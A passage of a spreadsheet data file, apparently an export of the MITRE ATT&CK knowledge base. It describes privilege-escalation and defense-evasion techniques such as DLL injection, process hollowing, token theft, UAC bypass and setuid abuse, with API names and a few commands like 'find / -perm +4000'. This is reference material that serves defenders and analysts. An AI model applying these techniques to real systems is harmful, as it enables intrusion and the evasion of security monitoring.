If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. 
Proc memory injection involves enumerating the memory of a process via the /proc filesystem (&lt;code&gt;/proc/[pid]&lt;/code&gt;) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes’ stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes’ memory map within &lt;code&gt;/proc/[pid]/maps&lt;/code&gt; can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man) 
Other techniques such as [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection) 
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; and &lt;code&gt;runas&lt;/code&gt;.(Citation: Microsoft RunAs)
Creating processes with a token not associated with the current user may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used. For example, the token could be duplicated via [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or created via [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) before being used to create a process.
While this technique is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001), the techniques can be used in conjunction where a token is duplicated and then used to create a new process.</t>
  </si>
  <si>
    <t>Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the `LogonUser` function. The function will return a copy of the new session's access token and the adversary can use `SetThreadToken` to assign the token to a thread.
This behavior is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) in that this refers to creating a new user token instead of stealing or duplicating an existing one.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process. 
APC injection is commonly performed by attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state.(Citation: Microsoft APC) A handle to an existing victim process is first created with native Windows API calls such as &lt;code&gt;OpenThread&lt;/code&gt;. At this point &lt;code&gt;QueueUserAPC&lt;/code&gt; can be used to invoke a function (such as &lt;code&gt;LoadLibrayA&lt;/code&gt; pointing to a malicious DLL). 
A variation of APC injection, dubbed "Early Bird injection", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.(Citation: Microsoft Atom Table)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process. Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process.
List-view controls are user interface windows used to display collections of items.(Citation: Microsoft List View Controls) Information about an application's list-view settings are stored within the process' memory in a &lt;code&gt;SysListView32&lt;/code&gt; control.
ListPlanting (a form of message-passing "shatter attack") may be performed by copying code into the virtual address space of a process that uses a list-view control then using that code as a custom callback for sorting the listed items.(Citation: Modexp Windows Process Injection) Adversaries must first copy code into the target process’ memory space, which can be performed various ways including by directly obtaining a handle to the &lt;code&gt;SysListView32&lt;/code&gt; child of the victim process window (via Windows API calls such as &lt;code&gt;FindWindow&lt;/code&gt; and/or &lt;code&gt;EnumWindows&lt;/code&gt;) or other [Process Injection](https://attack.mitre.org/techniques/T1055) methods.
Some variations of ListPlanting may allocate memory in the target process but then use window messages to copy the payload, to avoid the use of the highly monitored &lt;code&gt;WriteProcessMemory&lt;/code&gt; function. For example, an adversary can use the &lt;code&gt;PostMessage&lt;/code&gt; and/or &lt;code&gt;SendMessage&lt;/code&gt; API functions to send &lt;code&gt;LVM_SETITEMPOSITION&lt;/code&gt; and &lt;code&gt;LVM_GETITEMPOSITION&lt;/code&gt; messages, effectively copying a payload 2 bytes at a time to the allocated memory.(Citation: ESET InvisiMole June 2020) 
Finally, the payload is triggered by sending the &lt;code&gt;LVM_SORTITEMS&lt;/code&gt; message to the &lt;code&gt;SysListView32&lt;/code&gt; child of the process window, with the payload within the newly allocated buffer passed and executed as the &lt;code&gt;ListView_SortItems&lt;/code&gt; callback.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. 
PE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as &lt;code&gt;VirtualAllocEx&lt;/code&gt; and &lt;code&gt;WriteProcessMemory&lt;/code&gt;, then invoked with &lt;code&gt;CreateRemoteThread&lt;/code&gt; or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. (Citation: Elastic Process Injection July 2017) 
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the &lt;code&gt;CreateProcess&lt;/code&gt; API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via &lt;code&gt;svchost.exe&lt;/code&gt; or &lt;code&gt;consent.exe&lt;/code&gt;) rather than the current user context.(Citation: Microsoft UAC Nov 2018)
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be &lt;code&gt;explorer.exe&lt;/code&gt; rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as &lt;code&gt;lsass.exe&lt;/code&gt;), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)</t>
  </si>
  <si>
    <t>Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).</t>
  </si>
  <si>
    <t>Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own. 
Just-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner. This allows accounts to operate with only the permissions they need on a daily basis, and to request additional permissions as necessary. Sometimes just-in-time access requests are configured to require manual approval, while other times the desired permissions are automatically granted.(Citation: Google Cloud Just in Time Access 2023)(Citation: Azure Just in Time Access 2023)
Account impersonation allows user or service accounts to temporarily act with the permissions of another account. For example, in GCP users with the `iam.serviceAccountTokenCreator` role can create temporary access tokens or sign arbitrary payloads with the permissions of a service account.(Citation: Google Cloud Service Account Authentication Roles) In Exchange Online, the `ApplicationImpersonation` role allows a service account to use the permissions associated with specified user accounts.(Citation: Microsoft Impersonation and EWS in Exchange) 
Many cloud environments also include mechanisms for users to pass roles to resources that allow them to perform tasks and authenticate to other services. While the user that creates the resource does not directly assume the role they pass to it, they may still be able to take advantage of the role's access -- for example, by configuring the resource to perform certain actions with the permissions it has been granted. In AWS, users with the `PassRole` permission can allow a service they create to assume a given role, while in GCP, users with the `iam.serviceAccountUser` role can attach a service account to a resource.(Citation: AWS PassRole)(Citation: Google Cloud Service Account Authentication Roles)
While users require specific role assignments in order to use any of these features, cloud administrators may misconfigure permissions. This could result in escalation paths that allow adversaries to gain access to resources beyond what was originally intended.(Citation: Rhino Google Cloud Privilege Escalation)(Citation: Rhino Security Labs AWS Privilege Escalation)
**Note:** this technique is distinct from [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003), which involves assigning permanent roles to accounts rather than abusing existing permissions structures to gain temporarily elevated access to resources. However, adversaries that compromise a sufficiently privileged account may grant another account they control [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) that would allow them to also abuse these features. This may also allow for greater stealth than would be had by directly using the highly privileged account, especially when logs do not clarify when role impersonation is taking place.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using `DuplicateToken` or `DuplicateTokenEx`. The token can then be used with `ImpersonateLoggedOnUser` to allow the calling thread to impersonate a logged on user's security context, or with `SetThreadToken` to assign the impersonated token to a thread.
An adversary may perform [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system.
When an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally [Create Process with Token](https://attack.mitre.org/techniques/T1134/002) using `CreateProcessWithTokenW` or `CreateProcessAsUserW`. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) is also distinct from [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) in that it refers to duplicating an existing token, rather than creating a new one.</t>
  </si>
  <si>
    <t>Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)
Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading)</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., &lt;code&gt;C:\unsafe path with space\program.exe&lt;/code&gt; vs. &lt;code&gt;"C:\safe path with space\program.exe"&lt;/code&gt;). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is &lt;code&gt;C:\program files\myapp.exe&lt;/code&gt;, an adversary may create a program at &lt;code&gt;C:\program.exe&lt;/code&gt; that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)
This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. 
Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).(Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)
Although small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.
Execution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as &lt;code&gt;WriteProcessMemory&lt;/code&gt; and &lt;code&gt;CreateRemoteThread&lt;/code&gt;.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process.  (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly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action.(Citation: TechNet How UAC Works)
If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box.(Citation: TechNet Inside UAC)(Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)
Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
* &lt;code&gt;eventvwr.exe&lt;/code&gt; can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)
Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)</t>
  </si>
  <si>
    <t>Adversaries may leverage the &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. 
Although this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.
Adversaries may abuse &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it's all broken!)</t>
  </si>
  <si>
    <t>An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222/002)). The &lt;code&gt;chmod&lt;/code&gt; command can set these bits with bitmasking, &lt;code&gt;chmod 4777 [file]&lt;/code&gt; or via shorthand naming, &lt;code&gt;chmod u+s [file]&lt;/code&gt;. This will enable the setuid bit. To enable the setgid bit, &lt;code&gt;chmod 2775&lt;/code&gt; and &lt;code&gt;chmod g+s&lt;/code&gt; can be used.
Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse is often part of a "shell escape" or other actions to bypass an execution environment with restricted permissions.
Alternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)). The setuid and setguid bits are indicated with an "s" instead of an "x" when viewing a file's attributes via &lt;code&gt;ls -l&lt;/code&gt;. The &lt;code&gt;find&lt;/code&gt; command can also be used to search for such files. For example, &lt;code&gt;find / -perm +4000 2&gt;/dev/null&lt;/code&gt; can be used to find files with setuid set and &lt;code&gt;find / -perm +2000 2&gt;/dev/null&lt;/code&gt; may be used for setgid. Binaries that have these bits set may then be abused by adversaries.(Citation: GTFOBins Suid)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. 
VDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009)(Citation: Backtrace VDSO)(Citation: VDSO Aug 2005)(Citation: Syscall 2014)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process.  </t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These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Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the &lt;code&gt;%TEMP%&lt;/code&gt; directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012)  (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.
Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert a domain to a federated domain, which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain) </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.  
DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as &lt;code&gt;VirtualAllocEx&lt;/code&gt; and &lt;code&gt;WriteProcessMemory&lt;/code&gt;, then invoked with &lt;code&gt;CreateRemoteThread&lt;/code&gt; (which calls the &lt;code&gt;LoadLibrary&lt;/code&gt; API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017) 
Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of &lt;code&gt;LoadLibrary&lt;/code&gt;).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017) 
Another variation of this method, often referred to as Module Stomping/Overloading or DLL Hollowing, may be leveraged to conceal injected code within a process. This method involves loading a legitimate DLL into a remote process then manually overwriting the module's &lt;code&gt;AddressOfEntryPoint&lt;/code&gt; before starting a new thread in the target process.(Citation: Module Stomping for Shellcode Injection) This variation allows attackers to hide malicious injected code by potentially backing its execution with a legitimate DLL file on disk.(Citation: Hiding Malicious Code with Module Stomping) 
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process. 
Thread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as &lt;code&gt;OpenThread&lt;/code&gt;. At this point the process can be suspended then written to, realigned to the injected code, and resumed via &lt;code&gt;SuspendThread &lt;/code&gt;, &lt;code&gt;VirtualAllocEx&lt;/code&gt;, &lt;code&gt;WriteProcessMemory&lt;/code&gt;, &lt;code&gt;SetThreadContext&lt;/code&gt;, then &lt;code&gt;ResumeThread&lt;/code&gt; respectively.(Citation: Elastic Process Injection July 2017)
This is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing process rather than creating a process in a suspended state.  
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. 
Ptrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: &lt;code&gt;malloc&lt;/code&gt;) then invoking that memory with &lt;code&gt;PTRACE_SETREGS&lt;/code&gt; to set the register containing the next instruction to execute. Ptrace system call injection can also be done with &lt;code&gt;PTRACE_POKETEXT&lt;/code&gt;/&lt;code&gt;PTRACE_POKEDATA&lt;/code&gt;, which copy data to a specific address in the target processes’ memory (ex: the current address of the next instruction). (Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) 
Ptrace system call injection may not be possible targeting processes that are non-child processes and/or have higher-privileges.(Citation: BH Linux Inject) 
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.  
Process hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as &lt;code&gt;CreateProcess&lt;/code&gt;, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as &lt;code&gt;ZwUnmapViewOfSection&lt;/code&gt; or &lt;code&gt;NtUnmapViewOfSection&lt;/code&gt;  before being written to, realigned to the injected code, and resumed via &lt;code&gt;VirtualAllocEx&lt;/code&gt;, &lt;code&gt;WriteProcessMemory&lt;/code&gt;, &lt;code&gt;SetThreadContext&lt;/code&gt;, then &lt;code&gt;ResumeThread&lt;/code&gt; respectively.(Citation: Leitch Hollowing)(Citation: Elastic Process Injection July 2017)
This is very similar to [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process. 
Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF)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 (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)
Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)
Adversaries may abuse TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055). Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as &lt;code&gt;NtUnmapViewOfSection&lt;/code&gt;, &lt;code&gt;VirtualProtectEx&lt;/code&gt;, and &lt;code&gt;SetThreadContext&lt;/code&gt;. (Citation: BlackHat Process Doppelgänging Dec 2017)
Process Doppelgänging is implemented in 4 steps (Citation: BlackHat Process Doppelgänging Dec 2017):
* Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.
* Load – Create a shared section of memory and load the malicious executable.
* Rollback – Undo changes to original executable, effectively removing malicious code from the file system.
* Animate – Create a process from the tainted section of memory and initiate execution.
